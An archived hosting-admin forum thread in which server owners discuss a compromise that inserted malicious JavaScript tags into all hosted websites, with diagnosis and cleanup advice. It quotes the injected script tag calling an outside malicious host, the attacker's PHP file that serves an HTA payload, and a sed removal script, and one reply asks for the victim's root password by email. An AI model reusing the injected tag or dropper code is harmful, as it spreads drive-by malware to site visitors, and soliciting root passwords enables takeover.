The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Virus TROJAN.DROPPER, need help!

Discussion in 'General Discussion' started by elenlace, Aug 25, 2004.

  1. elenlace

    elenlace Well-Known Member

    Joined:
    Sep 10, 2002
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    Hello,

    We have CPanel and the wholy server has been infected with a virus called BLOODHOUND.EXPLOIT and/or TROJAN.DROPPER, VBS/INOR, etc, , I have CPanel's open_base dir security enabled so I have no idea how it has been spread to all the sites.

    The code that is "inserted" into webpages varies, but it is usually:

    <script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>

    We need help as well, we are willing to pay an expert to clean our server and give us the "recipe" to solve similar issues in the future.

    Regards,

    elenlace

    PS: We have already restored the server and bringing the sites from backups restarted the virus spread.
     
  2. WebKingPin

    WebKingPin Member

    Joined:
    Dec 5, 2003
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    Not sure those are your problem

    Hi,

    I have research both of the viruses you claim have infected your system.
    I take it you are running a UNIX box correct?
    If so both varients do not affect UNIX.
    http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html

    Are your running OS commerce on any of your sites? If so you may want to check the directories. We noticed a security hole in the latest release which allows someone to add
    files to the cart system. I am not sure exactly how they did this but I remove 2 zip files containing trojans deeply nested within folders with ramdon names in the OS comm dir.

    Hope this helps,

    WKP
     
  3. WebKingPin

    WebKingPin Member

    Joined:
    Dec 5, 2003
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    aww yes

    Thinking....

    After further review of the symatec site. I would say that it is definately something on your local machine. The virus is defined as a Internet Explorer vulnerablility. Sounds to me you need to update from MS website and run a virus scan on your PC.

    I could be wrong but this is what I think your problem is.


    later,
    WKP
     
  4. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
  5. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    This script will fix it:
    cd /home
    files=`grep -r deckewwwr2 * -l | grep -v convert`
    files2=$files
    for ii in $files2; do
    echo "Processing $ii"
    cp -p $ii $ii.bak
    cat $ii.bak | sed -e 's|<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>
    ||g' > $ii
    rm $ii.bak
    done

    What kernel are you using? (uname -r)
     
  6. elenlace

    elenlace Well-Known Member

    Joined:
    Sep 10, 2002
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    Hi Abe,

    I'm using 2.4.21-15.0.4.ELsmp.

    I do have an idea how this happenned. A local user (someone that purchased an account, later to be found to be a malicious user) put 3 files on his hosting.

    data.hta
    spl.php
    index.htm

    spl.php was a php script "compiling" the information on the data.hta.

    From there, it spread like a desease. Every account is getting it, and I can't find anything wrong with the server. Of course, it has been days since the malicious user account was cancelled and he has no access to the server. I have limited SSH to only my IP and ran rkhunter to check for rootkits. I have even ran the evaluation version of mcafee for linux and nothing wrong as well. It only initially detected the virus as VBS/Inor on the backup of the malicious user account.

    I have even restored the server last sunday night, brought the sites up using the Cpanel backup, and the virus showed up AGAIN.

    It calls several websites, mainly asbestos-ccl.com. I can put the complete list if it helps.

    The virus it trieds to spread are a variety of Bloodhound, Generic Trojan, Javascript virus, etc.

    Is important to mention we are very security-aware:

    TMP noexec nosuid
    APF firewall blocking most ports INGRESS OUTGRESS
    MailScanner+CLAMAV for exim (I'm aware has probably nothing to do with this exploit)
    RKHunter ran daily (0 rootkits so far)
    SSH limited to our ISP's IP Block
    No SSH for customers (of course blocked by the previous statement)
    Always latest, secure kernel
    Latest stable version of CPanel
    Latest version of Apache
    PHP 4.3.8

    WHAT ELSE DO WE NEED?

    I hope this thread helps anyone having this very annoying problem in the future. We will find a solution and once I find it I will post it here.

    Regards,

    elenlace
     
  7. elenlace

    elenlace Well-Known Member

    Joined:
    Sep 10, 2002
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    US
    Further information on this issue:

    The PHP file contained:

    <?
    header("content-type: application/hta");
    $szFile="data.hta";
    $hFile=fopen($szFile, "r");
    $szHTML=fread($hFile,filesize($szFile));
    fclose($hFile);
    echo($szHTML);
    ?>

    The .hta was a bunch of code, probably binary content "compiled" by the previous code.
     
  8. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Upgrade your kernel ASAP!


    Did this script work?
    cd /home
    files=`grep -r deckewwwr2 * -l | grep -v convert`
    files2=$files
    for ii in $files2; do
    echo "Processing $ii"
    cp -p $ii $ii.bak
    cat $ii.bak | sed -e 's|<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>
    ||g' > $ii
    rm $ii.bak
    done
     
  9. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Create file called
    fixpages
    put my script in fixpages
    chmod 700 fixpages
    ./fixpages
     
  10. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    EMail me your root password if you want me to take a look

    Do you have physical access to this server?
     
  11. tinboye22

    tinboye22 Active Member

    Joined:
    Sep 16, 2004
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Bloodhound Exploit 54 - NEW!!

    My sever was infected by this virus through a backdoor in a file that was installed by cpanel
    Once i found out about it, my it people were quick to rectify but i wanted to share this with others that may have this issue

    enable_dl function in php is to blame, all you need to do is turn it off and remove the trojans, then your server will function fine. Be aware some scripts require this file to function. But as soon as you enable it your server will be exploited again.

    thanks

    Justin
     
  12. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Just to clarify - your server would not have been infected by this. The server would have been compromised through a vulnerable php script and then that dynamic module installed. It is that module which redirects sites that infects windows PC's with that virus. So, this is a server compromise due to insecure scripts, not a virus infection which implies something different:

    http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.54.html

    Either way, disabling enable_dl is always a good idea.
     
  13. hostit1

    hostit1 Well-Known Member

    Joined:
    Jul 24, 2003
    Messages:
    88
    Likes Received:
    0
    Trophy Points:
    0
    How do you find root cause

    Hello,

    We have a terible trojan that gets loaded into memory. How do we find out where the trojan is spawning its exploit into memory.

    What should I look for. I believe it is somewhere in the home directory.

    Any ideas?

    Kernel of the infected machine(s) 2.6.9-11.ELsmp & 2.6.9-22.0.1.ELsmp
    I have updated the kernel today to 2.6.9-34.0.1.ELsmp on both machines as well as performed a /scripts/upcp

    Should that fix the problem? I would love to find out where this trojan is "hiding" at so I can clean it up.

    We have mod_security and mod_evasive installed as well as apf

    Also, I ran the latest version of rkhunter and chkrootkit and they both found nothing.

    Tim Rice
    Host It Now Networks
     
    #13 hostit1, Jun 25, 2006
    Last edited: Jun 25, 2006
  14. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Well, you've posted to an old thread which probably is irrelevant to your problem which is always the dnager when digging them up like this rather than simply starting a new thread which would be more appropriate.

    You need to explain more about why you think you have a trojan in memory and how it is manifesting. There are very very few real tojans or viruses for linux. The most likely exploit these days that loads into memory is if you have allowed dynamic libraries in php.ini in which case you should disable it:

    enable_dl = Off

    Then restart httpd.
     
  15. hostit1

    hostit1 Well-Known Member

    Joined:
    Jul 24, 2003
    Messages:
    88
    Likes Received:
    0
    Trophy Points:
    0
    Sorry John if I posted in the wrong area. It seems like the post was very similar to the behavior that I am seeing.

    I do have enable_dl turned off in the php.ini. I see very little usefuless in enabling this.
    Many clients complain that there will be coding added to their pages such as a javascript source for a non-existant file

    Others state that their anti-virus software detects a trojan when visiting certian sites.

    I have moved some of the larger clients who have complained about this to their own dedicated cpanel server.
    If I restart the server, things are great for awhile, then the complains start coming back in.


    BTW, we enjoyed the cpanel training in Houston.

    Tim
     
  16. kashif

    kashif Active Member

    Joined:
    Jul 11, 2003
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Lahore
    Javascript for trojan auto inserted in all websites

    Hi Chirpy,

    Sorry if I have not posted this in correct thread. Actually I have very serious issue that all my websites of server are getting the javascript code for trojan automatically inserted in pages. e.g.

    <script language='JavaScript' type='text/javascript' src='ghfdl.js'></script>

    And then I will get message on windows PC with NOD 32 of trojan being download from that server. I have tried to find from where it is loading but couldn't. Can you kindly tell me how can I find this from where it is loading on all websites. And also one more issue that I can't create directories or files with names only having numerics e.g. mkdir 123456 will give me this error:

    mkdir: cannot create directory `123456': No such file or directory

    even that directory doesn't exist on whole server. Can you kindly provide any guidelines in this regards. Especially that trojan javascript issue. I have already disabled enable_dl in php.ini.

    Thankyou,

    Best Regards,
     
  17. kashif

    kashif Active Member

    Joined:
    Jul 11, 2003
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Lahore
    Anyone can help me in this regards. How can I disable that javascript being added in every website. Even no rootkit found on server...
     
  18. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    This is one of the most recent Linux exploits. Try the following: run ClamAV and F-Prot. Also, run chkrootkit and rkhunter. If none of these helped, you can seek help from your host, or seek professional help. Good luck!
     
  19. kashif

    kashif Active Member

    Joined:
    Jul 11, 2003
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Lahore
    Hi Andy,
    But how can I detect that from where that javascript is being added in all websites... Do tell me so that I can fix this asap....

    Thanks....
     
    #19 kashif, Dec 30, 2007
    Last edited: Dec 30, 2007
  20. danbriant

    danbriant Registered

    Joined:
    Jan 9, 2008
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    I am having the exact same issue as well except my js call is like this
    <script language='JavaScript' type='text/javascript' src='avabf.js'></script>
    , ran a rkhunter and found nothing, about to runa clamav scan
     
Loading...
Similar Threads - Virus TROJAN DROPPER
  1. manokiss
    Replies:
    1
    Views:
    286

Share This Page